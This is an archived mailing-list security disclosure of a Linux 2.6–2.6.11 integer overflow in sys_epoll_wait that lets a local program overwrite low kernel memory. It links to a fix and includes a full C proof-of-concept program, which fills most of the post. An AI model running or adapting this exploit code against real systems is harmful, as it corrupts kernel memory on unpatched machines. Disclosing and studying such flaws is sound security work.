lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: guninski at guninski.com (Georgi Guninski) Subject: overwriting low kernel memory it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) memory due to integer overflow in sys_epoll_wait and misuse of __put_user in ep_send_events tested on i386. despite the overflow, the os seemingly continues normal operation. fix: http://linux.bkbits.net:8080/linux-2.6/cset@...dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d ------------------------------------------------- /* * copyright georgi guninski. * cannot be used in vulnerabilities databases like securityfocus and mitre * */ #include <stdio.h> #include <sys/epoll.h> #include <sys/socket.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <stdlib.h> #define __KERNEL__ #include <asm/processor.h> #undef __KERNEL__ #define MAXV 500 int main(int argc,char ** argv) { int epfd; int i; int res; struct epoll_event ev; int *fds; int over; void *km; over= ((unsigned int)-1)/sizeof(struct epoll_event)+1; km=(void *)(TASK_SIZE - over*sizeof(struct epoll_event) - 4); printf("sizeof=%d %x %lx\n",sizeof(struct epoll_event),over,(unsigned long)km); epfd = epoll_create(MAXV); printf("Epoll descriptor %i\n",epfd); fds=calloc(2*MAXV,sizeof(int)); for(i=0;i<MAXV;i++) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2*i])) perror("pair"); ev.data.u32 = 0x42424242; ev.events = EPOLLOUT|EPOLLIN | 0x42424242; res = epoll_ctl(epfd,EPOLL_CTL_ADD,fds[2*i],&ev); } for(i=0;i<MAXV;i++) write(fds[2*i+1],&i,sizeof(i)); system("sync"); for(i = 0; i < 1; i++) { res = epoll_wait(epfd,km,over,-1); printf("epoll_wait returned %i\n",res); printf("check what is after TASK_SIZE\n"); } close(epfd); return 42; } ----------------------------------------- -- where do you want bill gates to go today?
Powered by blists - more mailing lists